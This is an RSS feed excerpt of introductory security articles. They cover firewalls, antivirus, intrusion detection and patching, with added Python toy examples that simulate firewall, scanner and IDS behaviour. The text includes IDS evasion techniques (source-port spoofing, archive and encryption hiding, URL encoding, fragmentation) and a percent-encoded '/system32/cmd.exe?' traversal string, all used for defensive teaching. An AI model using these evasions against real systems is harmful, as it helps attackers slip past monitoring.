<h2 style="text-align: justify;">Employee Education</h2>
<p style="text-align: justify;">Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.</p>
<h2 style="text-align: justify;">Patch Management</h2>
<p style="text-align: justify;">Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must, as known vulnerabilities will have been addressed.</p>
<h2 style="text-align: justify;">Internet Monitoring Software</h2>
<p style="text-align: justify;">Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.</p>
<p>There is no single method that can guarantee 100% web security protection; however, a well thought-out strategy is one huge step towards minimizing the risk that the network could be targeted by the bad guys.</p>
]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 09 Jul 2011 11:40:00 +1000</pubDate>
		</item>
		<item>
			<title>Introduction To Network Security - Part 1</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro.html</guid>
			<description><![CDATA[<p style="text-align: justify;" align="left">As more and more people and businesses have begun to use computer networks and the Internet, the need for a secure computing environment has never been greater. Right now, information security professionals are in great demand and the importance of the field is growing every day. All the industry leaders have been placing their bets on security in the last few years.</p>
<p style="text-align: justify;" align="left">All IT vendors agree today that secure computing is no longer an optional component; it is something that should be integrated into every system rather than being thrown in as an afterthought. Usually programmers would concentrate on getting a program working, and then (if there was time) try to weed out possible security holes.</p>
<p style="text-align: justify;" align="left">Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.</p>
<p style="text-align: justify;">This article intends to serve as a very brief introduction to information security with an emphasis on networking.</p>
<p style="text-align: justify;">The reasons for this are twofold:</p>
<p style="text-align: justify;">Firstly, in case you did not notice, this is a networking website;</p>
<p style="text-align: justify;">Secondly, the time a system is most vulnerable is when it is connected to the Internet.</p>
<p style="text-align: justify;">For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.</p>
<p style="text-align: justify;">If you're a complete newbie however, do not despair. We would recommend you look under the Networking menu at the top of the site, where you will find our accolade-winning material on pretty much everything in networking.</p>
<h2>Hacker or Cracker?</h2>
<p style="text-align: justify;">There is a well-worn argument against the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is 'cracker' or, when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code', where a programmer would quickly program fixes to problems he faced).</p>
<p style="text-align: justify;">While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions throughout these articles, more than anything to avoid the inevitable flame mail we will get if we don't!</p>
<p style="text-align: justify;"><strong>On to the Cool Stuff!</strong></p>
<p style="text-align: justify;">This introduction is broadly broken down into the following parts :</p>
<p style="text-align: justify;">• The Threat to Home Users<br />• The Threat to the Enterprise<br />• Common Security Measures Explained<br />• Intrusion Detection Systems<br />• Tools an Attacker Uses<br />• What is Penetration-Testing?<br />• A Brief Walk-through of an Attack<br />• Where Can I Find More Information?<br />• Conclusion</p>
<h2 align="left">The Threat to Home Users</h2>
<p style="text-align: justify;">Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?". This is true in one sense -- it is unlikely that an attacker would individually target you, as to him you are just one more system on the Internet.</p>
<p style="text-align: justify;">Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems; when it finds one, this tool will automatically exploit the vulnerability and take control of the machine.</p>
<p style="text-align: justify;">The script kiddie can later use this vast collection of 'owned' systems to launch denial of service (DoS) attacks, or just cover his tracks by hopping from one system to another in order to hide his real IP address.</p>
<p style="text-align: justify;">This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to back trace the route of the attack, especially if the attacker relays it through systems in different geographic locations.</p>
<p style="text-align: justify;">It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.</p>
<p style="text-align: justify;">The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.</p>
<p style="text-align: justify;">Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.</p>
<p style="text-align: justify;">Another threat comes in the form of viruses, most often these may be propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.</p>
<p style="text-align: justify;">The effects of the virus may range from mundane (simply spreading to people in your address book) to devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victim's address book.</p>
<p style="text-align: justify;">So while you per se may not be high-profile enough to warrant a systematic attack, you are what I like to call a bystander victim: someone who got attacked simply because you could be attacked, and you were there to be attacked.</p>
<p style="text-align: justify;">As broadband and always-on Internet connections become commonplace, even hackers are targeting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems here that can be used as a base for launching other attacks.</p>
<h2 align="left">The Threat to the Enterprise</h2>
<p style="text-align: justify;">Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.</p>
<p style="text-align: justify;">Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.</p>
<p style="text-align: justify;">For the enterprise, security is very important -- the threats include:</p>
<p style="text-align: justify;">• Corporate espionage by competitors, <br />• Attacks from disgruntled ex-employees <br />• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)<br />• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.</p>
<p style="text-align: justify;">As far as securing the enterprise goes, it is not enough to merely install a firewall or intrusion detection system and assume that you are covered against all threats. The company must have a complete security policy and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.</p>
<p style="text-align: justify;">One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.</p>
<p style="text-align: justify;">After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.</p>
<p style="text-align: justify;">This person is often a network administrator, but invariably in the chaotic throes of day-to-day administration (yes, we all dread user support calls! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password-protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.</p>
<p style="text-align: justify;">While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targeted by an attacker. The company's network just happens to be one that the attacker knows how to break into and thus it gets targeted. This is often the case in attacks where company FTP or web servers have been used to host illegal material.</p>
<p style="text-align: justify;">The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because in many cases, the attackers are very good at hiding the illegal data. It's only when the bandwidth bill has to be paid that someone realises that something is amiss.</p>
<h2>Firewalls</h2>
<p style="text-align: justify;">By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimeter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network and controlled from one central location.</p>
<p style="text-align: justify;">The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.</p>
<p style="text-align: justify;">Here is the link to a detailed explanation of different firewall topologies: <a href="https://www.firewall.cx/networking/network-fundamentals/firewall-topologies-dmz-zone.html" target="_blank" title="Firewall.cx Firewall Topologies">Firewall.cx Firewall Topologies</a></p>
<p style="text-align: justify;">You also get what are known as 'personal firewalls' such as ZoneAlarm, Sygate Personal Firewall, Tiny Personal Firewall, Symantec Endpoint Security etc.</p>
<p style="text-align: justify;">These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.</p>
<p style="text-align: justify;">However, firewalls are no cure-all for network security woes. A firewall is only as good as its rule set, and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say a packet-filtering firewall blocks all inbound traffic except packets whose source port is 53 (DNS), so that everyone's DNS replies can get back in. An attacker can use this rule to his advantage: by setting the source port of his scan or attack packets to 53, he gets all of his traffic through, because the firewall matches on the source port alone and assumes it is DNS traffic. A stateful firewall that only admits a reply matching a query an internal host actually sent closes this hole.</p>
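<p style="text-align: justify;">The source-port trick above, and the stateful fix for it, as an added worked example (this is illustrative code written for this page, not the article's own material or any firewall vendor's code). The internal prefix, the addresses and the ports are constructed; the point is that a rule which trusts source port 53 admits every scan packet, while connection tracking admits only the reply to a query an internal host really sent.</p>

```python
# Added example (not from the original article): why a filter that trusts a
# source port of 53 is a hole, and how connection tracking closes it.
# Addresses, ports and the internal prefix are constructed for illustration.
from dataclasses import dataclass

INTERNAL_PREFIX = "10.0.0."   # assumed internal network
DNS_PORT = 53


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "udp"


def stateless_allow(pkt: Packet) -> bool:
    """The rule set from the article's example: anything from inside is
    allowed out, and inbound traffic is allowed only if its source port is
    53 so that DNS replies get back in.  Only the source port is checked,
    so a scanner that sets its source port to 53 walks straight through."""
    if pkt.src_ip.startswith(INTERNAL_PREFIX):
        return True
    return pkt.src_port == DNS_PORT


class StatefulFilter:
    """Connection-tracking version: an inbound packet from port 53 is only
    accepted if an internal host previously sent a query to that server
    from that exact port.  Unsolicited 'replies' are dropped."""

    def __init__(self) -> None:
        self._pending = set()   # (client_ip, client_port, server_ip)

    def allow(self, pkt: Packet) -> bool:
        if pkt.src_ip.startswith(INTERNAL_PREFIX):
            if pkt.dst_port == DNS_PORT:
                self._pending.add((pkt.src_ip, pkt.src_port, pkt.dst_ip))
            return True
        key = (pkt.dst_ip, pkt.dst_port, pkt.src_ip)
        if pkt.src_port == DNS_PORT and key in self._pending:
            self._pending.discard(key)   # one reply per query
            return True
        return False


def simulate() -> dict:
    """Run a source-port-53 scan and a legitimate DNS exchange through both
    filters and report how many scan packets each one lets in."""
    attacker = "203.0.113.5"      # TEST-NET-3, constructed
    victim = "10.0.0.10"
    resolver = "198.51.100.53"    # TEST-NET-2, constructed
    scan = [Packet(attacker, DNS_PORT, victim, port, "tcp") for port in (22, 80, 445)]
    query = Packet(victim, 40001, resolver, DNS_PORT)
    reply = Packet(resolver, DNS_PORT, victim, 40001)

    stateful = StatefulFilter()
    stateful.allow(query)          # internal host asks the resolver first
    return {
        "stateless_scan_packets_admitted": sum(stateless_allow(p) for p in scan),
        "stateful_scan_packets_admitted": sum(stateful.allow(p) for p in scan),
        "stateless_reply_admitted": stateless_allow(reply),
        "stateful_reply_admitted": stateful.allow(reply),
    }


if __name__ == "__main__":
    for name, value in simulate().items():
        print(f"{name}: {value}")
```

<p style="text-align: justify;">Running it shows the stateless rule admitting all three scan packets and the stateful filter admitting none, while the genuine DNS reply passes both. The state table is keyed on the client's ephemeral port as well as the two addresses, which is what stops a forged 'reply' from outside matching anything.</p>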
<p style="text-align: justify;">Bypassing firewalls is a whole study in itself, and one which is very interesting, especially to those with a passion for networking, as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well-installed firewall can severely thwart a would-be attacker's plans.</p>
<p style="text-align: justify;">It is important to remember that a packet-filtering firewall does not look into the data section of the packet. Thus if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver, because the request that carries the exploit is, to the firewall, just another permitted connection to the web port. Looking inside the packet would be the job of an intrusion detection system (covered further on) or an application-layer proxy.</p>
<h2>Anti-Virus Systems</h2>
<p style="text-align: justify;">Everyone is familiar with desktop anti-virus packages like Norton AntiVirus and McAfee. The way these operate is fairly simple: when researchers find a new virus, they extract some unique characteristic of it (typically a distinctive sequence of bytes in the infected file or a hash of the file; behavioural traits such as a registry key it creates or a file it replaces are used as well) and out of this they write the virus 'signature'.</p>
<p style="text-align: justify;">The full set of signatures that your antivirus scans for is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of its definitions. In the enterprise it is very common for admins to install anti-virus software on all machines but have no policy for regular updates of the definitions. This is meaningless protection and serves only to provide a false sense of security.</p>
<p style="text-align: justify;">With the spread of email viruses, anti-virus scanning at the MTA (Mail Transfer Agent, also known as the 'mail server') is becoming increasingly popular. The mail server automatically scans any email it receives for viruses and quarantines infected messages. The idea is that since all mail passes through the MTA, this is the logical point to scan. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these scanners can be evaded quite simply: if the infected file or trojan is zipped, nested inside several archives, or encrypted (for instance a password-protected archive with the password given in the message body), the anti-virus system may not be able to scan it. The gateway should therefore treat attachments it cannot inspect as suspicious rather than as clean.</p>
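<p style="text-align: justify;">To make the evasion concrete, here is an added example (written for this page; not code from the article or from any anti-virus product) of a toy signature scanner. The signature database holds one constructed marker string standing in for a real sample. The same payload is scanned raw, inside a deflate-compressed ZIP, inside a ZIP nested in another ZIP, and after being encrypted with a key the scanner does not have; an archive-blind scan of the zipped bytes finds nothing, an archive-aware scan recurses into the members and finds the marker, and the encrypted copy is invisible to any content scan.</p>

```python
# Added example, not code from the original article: a toy signature
# scanner that shows why an archive-blind scanner at the mail gateway misses
# a zipped payload, why recursing into archives fixes that, and why an
# encrypted payload cannot be content-scanned at all.  The "malware" is a
# constructed marker string, not real malicious code.
import io
import zipfile

# Constructed signature database: name -> byte pattern found in the sample.
SIGNATURES = {
    "Example.Trojan.Marker": b"CONSTRUCTED-TROJAN-MARKER-0001",
}


def scan_bytes(data: bytes) -> list:
    """Plain content scan: every signature whose pattern occurs in data."""
    return sorted(name for name, pattern in SIGNATURES.items() if pattern in data)


def scan_recursive(data: bytes, depth: int = 0, max_depth: int = 3) -> dict:
    """Archive-aware scan.  ZIP members are extracted and scanned in turn,
    recursing into nested archives only up to max_depth so a deeply nested
    archive cannot stall the scanner.  Members that cannot be opened
    (password protected) are reported as uninspected instead of silently
    passed, so policy can quarantine them."""
    report = {"hits": scan_bytes(data), "uninspected": []}
    if depth >= max_depth or not data.startswith(b"PK\x03\x04"):
        return report
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.flag_bits & 0x1:            # general-purpose bit 0: encrypted
                report["uninspected"].append(info.filename)
                continue
            inner = scan_recursive(archive.read(info), depth + 1, max_depth)
            report["hits"] += inner["hits"]
            report["uninspected"] += inner["uninspected"]
    return report


def make_zip(member_name: str, payload: bytes) -> bytes:
    """Build an in-memory, deflate-compressed ZIP holding one member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(member_name, payload)
    return buf.getvalue()


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Stand-in for 'the attacker encrypted it' with a key the scanner lacks."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def demo() -> dict:
    """Scan the same constructed payload raw, zipped, double-zipped and
    encrypted, and report what each scanning strategy detects."""
    payload = b"padding " * 16 + SIGNATURES["Example.Trojan.Marker"] + b" tail" * 8
    zipped = make_zip("invoice.exe", payload)
    nested = make_zip("outer.zip", zipped)
    encrypted = xor_encrypt(payload, b"s3cret")
    return {
        "raw": scan_bytes(payload),
        "zipped_naive": scan_bytes(zipped),          # compressed bytes hide the pattern
        "zipped_aware": scan_recursive(zipped)["hits"],
        "nested_aware": scan_recursive(nested)["hits"],
        "encrypted_aware": scan_recursive(encrypted)["hits"],
    }


if __name__ == "__main__":
    for case, hits in demo().items():
        print(f"{case:16s} -> {hits or 'clean'}")
```

<p style="text-align: justify;">The <em>uninspected</em> list is the important design choice: a member the scanner cannot open is surfaced to policy rather than passed as clean, which is exactly the gap the password-protected-archive trick relies on. The depth limit is there because recursion into archives is itself an attack surface.</p>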
<p style="text-align: justify;">End users must be taught how to respond to anti-virus alerts. This is especially true in the enterprise: an attacker doesn't need to try and bypass your fortress-like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package and he will have a backdoor into the internal network.</p>
<p style="text-align: justify;">It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.</p>
<h2>Intrusion Detection Systems</h2>
<p style="text-align: justify;">IDSs have become the 'next big thing', the way firewalls were some time ago. There are basically two types of Intrusion Detection Systems:</p>
<p style="text-align: justify;">• Host based IDS<br />• Network based IDS</p>
<p style="text-align: justify;">Host based IDS - These are installed on a particular important machine (usually a server or some other likely target) and are tasked with making sure that the system state matches a known-good baseline. For example, the popular file-integrity checker Tripwire: this program is run on the target machine just after it has been installed. It creates a database of file signatures (cryptographic hashes) for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well, as most attackers will replace a common system file with a trojaned version to give them backdoor access. The baseline database and the checker itself must be protected (kept on read-only media or off the host), otherwise an attacker who gains root can simply re-baseline the trojaned files.</p>
<p style="text-align: justify;">Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card passes up all the traffic it sees, even frames not addressed to it). The sniffer is backed by a database of known attack signatures, and the IDS analyses each packet it picks up to check for known attacks. For example, a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in its database and will alert the administrator.</p>
<p style="text-align: justify;">Newer IDSs support active prevention of attacks (such products are usually sold as intrusion prevention systems, or IPS). Instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time, or it can use 'session sniping' (injecting TCP resets) to fool both sides of the connection into closing it down so that the attack cannot be completed. Automatic blocking needs care: an attacker who spoofs the source address of a legitimate partner or DNS server can trick the IDS into blocking that host.</p>
<p style="text-align: justify;">Unfortunately IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern). This tempts a lot of administrators into turning them off or, even worse, not bothering to read the logs, which may result in an actual attack being missed.</p>
<p style="text-align: justify;">IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten with URL (percent) encoding, which the web server decodes but a naive IDS compares byte for byte, to look something like the following:</p>
<div class="info" style="text-align: justify;"><em><span style="color: #ff0000;">'%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f'</span></em></div>
<p style="text-align: justify;">which might be totally missed by the IDS. Furthermore, an attacker could split the attack across many packets by fragmenting them. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead, and since IDSs have to run at near real-time they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.</p>
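<p style="text-align: justify;">The signature match described under network based IDS above, and the two evasions just described, as one added example (illustrative code written for this page; not the article's own, and not any IDS product's rule engine). A naive matcher compares the raw request line against '/system32/cmd.exe?'; a normalising matcher first percent-decodes (repeatedly but bounded, to catch double encoding), folds backslashes and case, and only then matches; and a segment scanner shows that the same signature is missed when the request is split over 25-byte segments unless the stream is reassembled first. All request lines and segment sizes are constructed.</p>

```python
# Added example, not from the original article: a toy network IDS matcher
# for the '/system32/cmd.exe?' signature, showing how URL encoding, case
# changes and fragmentation defeat a naive matcher, and how normalising and
# reassembling before matching restores detection.  Request lines and
# segments are constructed for illustration.
import urllib.parse

# Constructed signature table: (rule name, pattern expected in the normalised URI)
SIGNATURES = [
    ("web-iis cmd.exe access", "/system32/cmd.exe?"),
]


def naive_match(request_line: str) -> list:
    """Byte-for-byte substring match, as the article's simple IDS does."""
    return [name for name, pattern in SIGNATURES if pattern in request_line]


def normalise(request_line: str, max_rounds: int = 3) -> str:
    """Bring the request into the form the web server will actually see:
    percent-decode (repeatedly, to catch double encoding, but bounded),
    fold backslashes to slashes, collapse '//' and lower-case the result."""
    text = request_line
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    text = text.replace("\\", "/").lower()
    while "//" in text:
        text = text.replace("//", "/")
    return text


def match(request_line: str) -> list:
    """Match against the normalised request instead of the raw bytes."""
    return naive_match(normalise(request_line))


def scan_segments(segments: list, reassemble: bool) -> list:
    """Per-segment scanning misses a signature split across packets; a
    stream-aware IDS reassembles first.  (Real reassembly must also cope
    with overlapping and out-of-order segments, which this toy ignores.)"""
    if reassemble:
        return match(b"".join(segments).decode("latin-1"))
    hits = []
    for segment in segments:
        hits += match(segment.decode("latin-1"))
    return sorted(set(hits))


def demo() -> dict:
    """Each entry is (naive matcher hit?, normalising/reassembling matcher hit?)."""
    plain = "GET /scripts/../../winnt/system32/cmd.exe? HTTP/1.0"
    encoded = ("GET /scripts/..%2f..%2fwinnt"
               "%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f HTTP/1.0")
    double = "GET /scripts/..%252f..%252fwinnt%252fsystem32%252fcmd.exe%253f HTTP/1.0"
    cased = "GET /scripts/../../WINNT/System32/CMD.EXE? HTTP/1.0"
    raw = encoded.encode("latin-1")
    segments = [raw[i:i + 25] for i in range(0, len(raw), 25)]   # 25-byte TCP segments
    return {
        "plain": (bool(naive_match(plain)), bool(match(plain))),
        "encoded": (bool(naive_match(encoded)), bool(match(encoded))),
        "double_encoded": (bool(naive_match(double)), bool(match(double))),
        "case_changed": (bool(naive_match(cased)), bool(match(cased))),
        "fragmented": (bool(scan_segments(segments, False)),
                       bool(scan_segments(segments, True))),
    }


if __name__ == "__main__":
    for case, (naive, normalised) in demo().items():
        print(f"{case:15s} naive={naive!s:5s} normalised={normalised}")
```

<p style="text-align: justify;">Only the plain request is caught by the naive matcher; the encoded, double-encoded, case-changed and fragmented variants are caught only after normalisation and reassembly. The decode loop is bounded on purpose: an IDS that decodes without limit can be made to burn CPU on crafted input, which is the same resource pressure the fragmentation evasion exploits.</p>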
<p style="text-align: justify;">The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic; in fact many of them have no IP address bound to the monitoring interface (or sit behind a receive-only tap), so they cannot be addressed at all. Thus the attacker does not know whether the network segment is being monitored or not.</p>
<h2>Patching and Updating</h2>
<p style="text-align: justify;">It is embarrassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid-back attitude to regularly patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSBlaster worm that spread havoc in August 2003. The vulnerability and its patch were public almost a month in advance, yet millions of users and businesses were infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.</p>
<p style="text-align: justify;">For the home user, it's a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.</p>
<p style="text-align: right;">Click here to read '<a href="https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro-p2.html" title="Introduction to Network Security- Part 2">Introduction to Network Security - Part 2</a>'</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sun, 04 Mar 2012 08:00:00 +1100</pubDate>
		</item>
	</channel>
</rss>
